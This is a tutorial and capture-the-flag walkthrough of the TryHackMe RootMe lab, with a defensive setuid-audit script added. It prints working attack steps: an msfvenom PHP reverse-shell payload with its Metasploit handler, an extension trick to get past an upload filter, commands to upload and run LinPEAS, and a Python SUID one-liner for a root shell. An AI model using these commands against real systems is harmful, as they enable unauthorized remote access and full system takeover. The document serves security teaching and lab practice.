Privilege Escalation with Binaries


How to escalate privileges on Linux using Metasploit and LinPEAS?

In the exciting world of cybersecurity, the ability to escalate privileges on a Linux system can be a powerful and necessary tool. In this lesson, we will address how to use tools to accomplish this task, specifically Metasploit and LinPEAS. We will go through each step clearly, providing a thorough understanding of the techniques employed.

What is the first step in privilege escalation?

To begin, it is important to understand the concept of privilege escalation. It refers to the process by which an unprivileged user acquires full access to a system, allowing them to perform restricted operations. We start with the analysis of the target virtual machine, for which we will use a TryHackMe machine, specifically the RootMe machine.

  1. Starting the virtual machine: We begin by starting the TryHackMe virtual machine and obtaining its IP address.

  2. Environment configuration: We use Kali Linux to browse the virtual machine and explore the available paths and services. Tools like Nmap and DirBuster are essential for this preliminary information-gathering phase.

How to obtain a shell and use Metasploit?

The next essential step is to obtain a shell on the system. A shell allows us to execute remote commands on the server. To achieve this, different paths can be followed:

  1. File upload: In a web application hosted on the virtual machine, we find a vulnerable point that allows file uploads. Exploiting this vulnerability is the key step.

  2. Creation of a malicious PHP file: We use Metasploit and its MSFVenom tool to create a PHP file. This file, when executed, will provide us with a shell connection.

    msfvenom -p php/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw > shell.php
  3. Upload the file and bypass protections: If there is a simple filter that blocks PHP files, we rename the file to shell.phtml or shell.php5 to bypass these restrictions.

  4. Connection with Metasploit: We configure a handler in Metasploit to wait for incoming connections. The payload set on the handler must be the same one given to msfvenom (php/meterpreter/reverse_tcp is the staged payload; php/meterpreter_reverse_tcp is the stageless one, and a mismatch means the session never completes).

    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set LHOST <YOUR_IP>
    set LPORT 4444
    run

How to analyze the system with LinPEAS and escalate privileges?

With a Meterpreter shell already established, we move on to analyzing the system for privilege escalation paths using LinPEAS.

  1. Upload LinPEAS to the system: We use Meterpreter to transfer the LinPEAS script, then open a system shell from Meterpreter to make it executable and run it; it scans the system for misconfigurations and escalation vectors.

    upload /home/kali/Desktop/linpeas.sh /tmp/linpeas.sh
    shell
    chmod +x /tmp/linpeas.sh
    /tmp/linpeas.sh
  2. Identify escalation vectors: LinPEAS provides a list of possible escalation vectors, including binaries that can be run with elevated privileges.

How to leverage binaries like Python to escalate privileges?

GTFOBins is an excellent source that details how to use Linux binaries to escalate privileges. If the Python binary is identified as one that runs with elevated privileges:

  1. GTFOBins query: We look up the specific binary to obtain the escalation command. For Python, the following command gives us a shell with root privileges, provided the binary actually runs with elevated privileges (for example, with the SUID bit set); otherwise os.setuid(0) fails with a permission error.

    python -c 'import os; os.setuid(0); os.system("/bin/sh")'
  2. Execute in the shell: In the shell obtained through Meterpreter, we execute the command and verify the user change:

    whoami

  If the execution is successful, the system should indicate that we are now root.
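An added example from the defender's side (not from the lesson, TryHackMe or LinPEAS): a small Python audit that walks the filesystem for setuid/setgid files and file capabilities and singles out interpreters like the Python binary above, which is exactly the condition the os.setuid(0) one-liner relies on. The names audit_suid, classify, has_file_caps and the INTERPRETERS list are my own.

```python
import os
import stat

# Interpreters that hand out a shell when run with elevated privileges (the
# lesson's Python case). Illustrative list, not the full GTFOBins catalogue.
INTERPRETERS = {"python", "perl", "ruby", "bash", "sh", "dash"}


def classify(path):
    """Why a setuid/setgid/caps file deserves a look."""
    name = os.path.basename(path)
    base = name.rstrip("0123456789.")      # python3.11 -> python
    if name in INTERPRETERS or base in INTERPRETERS:
        return "interpreter"               # os.setuid(0)-style escalation works here
    return "review"                        # normal for passwd/sudo, still verify


def has_file_caps(path):
    """True if the file carries Linux file capabilities (e.g. cap_setuid)."""
    getxattr = getattr(os, "getxattr", None)   # Linux only
    if getxattr is None:
        return False
    try:
        getxattr(path, "security.capability")
        return True
    except OSError:                            # no xattr, or xattrs unsupported
        return False


def audit_suid(roots):
    """Walk roots; return [(path, flags, reason)] for every flagged file."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for fname in files:
                path = os.path.join(dirpath, fname)
                try:
                    st = os.lstat(path)        # lstat: do not follow symlinks
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                flags = [name for bit, name in ((stat.S_ISUID, "suid"), (stat.S_ISGID, "sgid"))
                         if st.st_mode & bit]
                if has_file_caps(path):
                    flags.append("caps")
                if flags:
                    findings.append((path, "+".join(flags), classify(path)))
    return findings
```

On a real host, run audit_suid(["/usr/bin", "/usr/sbin"]) and compare the "interpreter" hits against what the distribution ships; an unexpected one is remediated with chmod u-s,g-s on the file or setcap -r for file capabilities.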

This systematic approach is not only a great example of how to deal with ethical cybersecurity situations, but also provides the basis for further exploration and learning in this fascinating field.

Contributions


Try Hack Me > RootMe

GTFOBins > Collects all the Linux binaries that can be leveraged for privilege escalation.

https://www.revshells.com/ this page can also help to create reverse shells, like what was done for the PHP file

To avoid leaving the Kali console when renaming the shell, just run: mv shell.php shell.php5 (shell.php is the original name and the other one is the new name you want to give it)
use exploit/multi/handler